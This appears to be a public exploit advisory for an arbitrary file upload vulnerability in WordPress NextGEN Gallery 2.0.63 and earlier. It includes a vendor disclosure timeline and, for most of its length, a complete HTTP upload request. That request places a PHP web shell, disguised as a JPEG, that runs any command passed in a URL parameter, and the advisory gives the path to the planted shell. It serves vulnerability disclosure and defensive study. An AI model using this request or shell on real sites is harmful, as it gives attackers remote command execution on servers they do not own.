# Exploit Title: Wordpress NextGEN Gallery Plugin 2.0.63 Arbitrary File Upload # Author: SANTHO ( @s4n7h0 ) # Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/ # Category: WebApp / CMS / Wordpress # Version: 2.0.63 and less --------------------------------------------------- Vulnerability Tracking ====================== Reported to vendor : Fri, May 9, 2014 at 9:20 PM Vendor Acknowledgement : Sat, May 10, 2014 at 2:36 AM Vendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at 7:54 PM Vulnerability Details ======================= POST /index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name= HTTP/1.1 Host: target_ip User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[target_ip]/wp-admin/admin.php?page=ngg_addgallery Content-Length: 630 Content-Type: multipart/form-data; boundary=---------------------------2427186578189 Cookie: X-Frame-Events_290365e482ebdeeed313858b8a3de791=%7B%22event%22%3A%22new_gallery%22%2C%22gallery_id%22%3A1%2C%22gallery_title%22%3A%22folder_name%22%2C%22context%22%3A%22attach_to_post%22%7D; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_57cce18206a53fed21932c6dc2920f94=admin%7C1399203127%7C70f668b775581773d1500b1b8162de42; wp-settings-time-1=1399030444 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache -----------------------------2427186578189 Content-Disposition: form-data; name="name" cmd.php.jpg -----------------------------2427186578189 Content-Disposition: form-data; name="file"; filename="cmd.php" Content-Type: image/jpeg <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <? if($_GET['cmd']) { system($_GET['cmd']); } ?> </pre> </BODY></HTML> The Shell can be accessible at following URL http://[target-ip]/wp-content/gallery/folder_name/cmd.php